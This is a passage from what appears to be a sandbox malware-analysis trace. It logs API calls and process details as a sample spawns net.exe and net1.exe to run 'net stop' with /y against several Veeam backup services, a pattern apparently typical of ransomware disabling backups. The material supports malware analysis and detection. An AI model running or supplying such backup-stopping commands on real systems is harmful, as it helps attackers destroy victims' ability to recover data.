_String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0118.924] _wcsicmp (_String1="srv", _String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0118.924] _wcsicmp (_String1="lanmanserver", _String2="VEEAMENTERPRISEMANAGERSVC") returned -10 [0118.924] _wcsicmp (_String1="alerter", _String2="VEEAMENTERPRISEMANAGERSVC") returned -21 [0118.925] _wcsicmp (_String1="netlogon", _String2="VEEAMENTERPRISEMANAGERSVC") returned -8 [0118.925] NetServiceControl (in: servername=0x0, service="VEEAMENTERPRISEMANAGERSVC", opcode=0x0, arg=0x0, bufptr=0x24f9f0 | out: bufptr=0x24f9f0) returned 0x889 [0118.925] wcscpy_s (in: _Destination=0xff6b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.925] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0118.928] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.930] GetFileType (hFile=0xb) returned 0x2 [0118.930] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f8b8 | out: lpMode=0x24f8b8) returned 1 [0118.930] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f8b0, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x24f8b0*=0x1e) returned 1 [0118.931] GetFileType (hFile=0xb) returned 0x2 [0118.931] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f8b8 | out: lpMode=0x24f8b8) returned 1 [0118.931] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f8b0, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x24f8b0*=0x2) returned 1 [0118.931] _ultow (in: _Dest=0x889, _Radix=2423072 | out: _Dest=0x889) returned="2185" [0118.931] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.931] GetFileType (hFile=0xb) returned 0x2 [0118.931] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f8b8 | out: lpMode=0x24f8b8) returned 1 [0118.932] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f8b0, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x24f8b0*=0x34) returned 1 [0118.932] GetFileType (hFile=0xb) returned 0x2 [0118.932] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f8b8 | out: lpMode=0x24f8b8) returned 1 [0118.932] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f8b0, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x24f8b0*=0x2) returned 1 [0118.933] NetApiBufferFree (Buffer=0x3bc0f0) returned 0x0 [0118.933] NetApiBufferFree (Buffer=0x3bc110) returned 0x0 [0118.933] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" [0118.933] exit (_Code=2) Process: id = "350" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x50879000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "341" os_parent_pid = "0x938" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12270 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12271 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12272 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12273 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 12274 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12275 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12276 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12277 start_va = 0xff690000 end_va = 0xff6c2fff entry_point = 0xff690000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12278 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12279 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12280 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12281 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 12282 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12283 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12284 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12285 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12286 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12287 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12288 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12308 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12309 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12310 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 12311 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12312 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12313 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12314 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12315 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12316 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12317 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12318 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12319 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12320 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12321 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12322 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12323 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12324 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12325 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12326 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12328 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 881 os_tid = 0x6f8 [0118.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbb0 | out: lpSystemTimeAsFileTime=0x1cfbb0*(dwLowDateTime=0xfc022eb0, dwHighDateTime=0x1d48689)) [0118.898] GetCurrentProcessId () returned 0x8bc [0118.898] GetCurrentThreadId () returned 0x6f8 [0118.898] GetTickCount () returned 0x27628 [0118.898] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbb8 | out: lpPerformanceCount=0x1cfbb8*=1816581600000) returned 1 [0118.899] GetModuleHandleW (lpModuleName=0x0) returned 0xff690000 [0118.899] __set_app_type (_Type=0x1) [0118.899] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6a9c9c) returned 0x0 [0118.899] __getmainargs (in: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788, _DoWildCard=0, _StartInfo=0xff6b479c | out: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788) returned 0 [0118.899] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.899] GetConsoleOutputCP () returned 0x1b5 [0118.901] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff6bcec0 | out: lpCPInfo=0xff6bcec0) returned 1 [0118.901] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.903] sprintf_s (in: _DstBuf=0x1cfb58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.904] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.911] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.911] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" [0118.911] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf8f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.911] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.911] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb48 | out: Buffer=0x1cfb48*=0x3d4d50) returned 0x0 [0118.911] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfb48 | out: Buffer=0x1cfb48*=0x3dc100) returned 0x0 [0118.911] _fileno (_File=0x7fefdba2a80) returned 0 [0118.911] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.911] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.911] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.911] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.911] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.911] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.911] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.911] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.911] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.912] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.912] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.912] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.912] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.912] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.912] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.912] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.912] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.912] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.912] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.912] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.912] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.912] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.912] _wcsicmp (_String1="accounts", _String2="VeeamDeploySvc") returned -21 [0118.912] _wcsicmp (_String1="computer", _String2="VeeamDeploySvc") returned -19 [0118.912] _wcsicmp (_String1="config", _String2="VeeamDeploySvc") returned -19 [0118.912] _wcsicmp (_String1="continue", _String2="VeeamDeploySvc") returned -19 [0118.912] _wcsicmp (_String1="cont", _String2="VeeamDeploySvc") returned -19 [0118.912] _wcsicmp (_String1="file", _String2="VeeamDeploySvc") returned -16 [0118.912] _wcsicmp (_String1="files", _String2="VeeamDeploySvc") returned -16 [0118.912] _wcsicmp (_String1="group", _String2="VeeamDeploySvc") returned -15 [0118.912] _wcsicmp (_String1="groups", _String2="VeeamDeploySvc") returned -15 [0118.912] _wcsicmp (_String1="help", _String2="VeeamDeploySvc") returned -14 [0118.912] _wcsicmp (_String1="helpmsg", _String2="VeeamDeploySvc") returned -14 [0118.912] _wcsicmp (_String1="localgroup", _String2="VeeamDeploySvc") returned -10 [0118.912] _wcsicmp (_String1="pause", _String2="VeeamDeploySvc") returned -6 [0118.912] _wcsicmp (_String1="session", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="sessions", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="sess", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="share", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="start", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="stats", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="statistics", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="stop", _String2="VeeamDeploySvc") returned -3 [0118.912] _wcsicmp (_String1="time", _String2="VeeamDeploySvc") returned -2 [0118.912] _wcsicmp (_String1="user", _String2="VeeamDeploySvc") returned -1 [0118.913] _wcsicmp (_String1="users", _String2="VeeamDeploySvc") returned -1 [0118.913] _wcsicmp (_String1="msg", _String2="VeeamDeploySvc") returned -9 [0118.913] _wcsicmp (_String1="messenger", _String2="VeeamDeploySvc") returned -9 [0118.913] _wcsicmp (_String1="receiver", _String2="VeeamDeploySvc") returned -4 [0118.913] _wcsicmp (_String1="rcv", _String2="VeeamDeploySvc") returned -4 [0118.913] _wcsicmp (_String1="netpopup", _String2="VeeamDeploySvc") returned -8 [0118.913] _wcsicmp (_String1="redirector", _String2="VeeamDeploySvc") returned -4 [0118.913] _wcsicmp (_String1="redir", _String2="VeeamDeploySvc") returned -4 [0118.913] _wcsicmp (_String1="rdr", _String2="VeeamDeploySvc") returned -4 [0118.913] _wcsicmp (_String1="workstation", _String2="VeeamDeploySvc") returned 1 [0118.913] _wcsicmp (_String1="work", _String2="VeeamDeploySvc") returned 1 [0118.913] _wcsicmp (_String1="wksta", _String2="VeeamDeploySvc") returned 1 [0118.913] _wcsicmp (_String1="prdr", _String2="VeeamDeploySvc") returned -6 [0118.913] _wcsicmp (_String1="devrdr", _String2="VeeamDeploySvc") returned -18 [0118.913] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamDeploySvc") returned -10 [0118.913] _wcsicmp (_String1="server", _String2="VeeamDeploySvc") returned -3 [0118.913] _wcsicmp (_String1="svr", _String2="VeeamDeploySvc") returned -3 [0118.913] _wcsicmp (_String1="srv", _String2="VeeamDeploySvc") returned -3 [0118.913] _wcsicmp (_String1="lanmanserver", _String2="VeeamDeploySvc") returned -10 [0118.913] _wcsicmp (_String1="alerter", _String2="VeeamDeploySvc") returned -21 [0118.913] _wcsicmp (_String1="netlogon", _String2="VeeamDeploySvc") returned -8 [0118.913] _wcsupr (in: _String="VeeamDeploySvc" | out: _String="VEEAMDEPLOYSVC") returned="VEEAMDEPLOYSVC" [0118.913] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3dce10 [0118.934] GetServiceKeyNameW (in: hSCManager=0x3dce10, lpDisplayName="VEEAMDEPLOYSVC", lpServiceName=0xff6b5750, lpcchBuffer=0x1cfa68 | out: lpServiceName="", lpcchBuffer=0x1cfa68) returned 0 [0118.935] _wcsicmp (_String1="msg", _String2="VEEAMDEPLOYSVC") returned -9 [0118.935] _wcsicmp (_String1="messenger", _String2="VEEAMDEPLOYSVC") returned -9 [0118.935] _wcsicmp (_String1="receiver", _String2="VEEAMDEPLOYSVC") returned -4 [0118.935] _wcsicmp (_String1="rcv", _String2="VEEAMDEPLOYSVC") returned -4 [0118.935] _wcsicmp (_String1="redirector", _String2="VEEAMDEPLOYSVC") returned -4 [0118.935] _wcsicmp (_String1="redir", _String2="VEEAMDEPLOYSVC") returned -4 [0118.935] _wcsicmp (_String1="rdr", _String2="VEEAMDEPLOYSVC") returned -4 [0118.935] _wcsicmp (_String1="workstation", _String2="VEEAMDEPLOYSVC") returned 1 [0118.935] _wcsicmp (_String1="work", _String2="VEEAMDEPLOYSVC") returned 1 [0118.935] _wcsicmp (_String1="wksta", _String2="VEEAMDEPLOYSVC") returned 1 [0118.935] _wcsicmp (_String1="prdr", _String2="VEEAMDEPLOYSVC") returned -6 [0118.935] _wcsicmp (_String1="devrdr", _String2="VEEAMDEPLOYSVC") returned -18 [0118.935] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMDEPLOYSVC") returned -10 [0118.935] _wcsicmp (_String1="server", _String2="VEEAMDEPLOYSVC") returned -3 [0118.935] _wcsicmp (_String1="svr", _String2="VEEAMDEPLOYSVC") returned -3 [0118.935] _wcsicmp (_String1="srv", _String2="VEEAMDEPLOYSVC") returned -3 [0118.935] _wcsicmp (_String1="lanmanserver", _String2="VEEAMDEPLOYSVC") returned -10 [0118.935] _wcsicmp (_String1="alerter", _String2="VEEAMDEPLOYSVC") returned -21 [0118.935] _wcsicmp (_String1="netlogon", _String2="VEEAMDEPLOYSVC") returned -8 [0118.935] NetServiceControl (in: servername=0x0, service="VEEAMDEPLOYSVC", opcode=0x0, arg=0x0, bufptr=0x1cfa70 | out: bufptr=0x1cfa70) returned 0x889 [0118.936] wcscpy_s (in: _Destination=0xff6b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.936] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0118.937] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.938] GetFileType (hFile=0xb) returned 0x2 [0118.939] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf938 | out: lpMode=0x1cf938) returned 1 [0118.939] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf930, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x1cf930*=0x1e) returned 1 [0118.939] GetFileType (hFile=0xb) returned 0x2 [0118.939] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf938 | out: lpMode=0x1cf938) returned 1 [0118.939] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf930, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x1cf930*=0x2) returned 1 [0118.940] _ultow (in: _Dest=0x889, _Radix=1898912 | out: _Dest=0x889) returned="2185" [0118.940] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.940] GetFileType (hFile=0xb) returned 0x2 [0118.940] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf938 | out: lpMode=0x1cf938) returned 1 [0118.940] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf930, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x1cf930*=0x34) returned 1 [0118.940] GetFileType (hFile=0xb) returned 0x2 [0118.941] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf938 | out: lpMode=0x1cf938) returned 1 [0118.941] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf930, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x1cf930*=0x2) returned 1 [0118.941] NetApiBufferFree (Buffer=0x3d4d50) returned 0x0 [0118.941] NetApiBufferFree (Buffer=0x3dc100) returned 0x0 [0118.941] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploySvc /y" [0118.941] exit (_Code=2) Process: id = "351" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6206c000" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12349 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12350 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12351 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12352 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12353 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12354 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12355 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12356 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12357 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12358 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12359 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 12360 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12361 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12362 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12363 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 12364 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12365 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12366 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12367 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 883 os_tid = 0xb18 Process: id = "352" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6458c000" os_pid = "0x920" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" 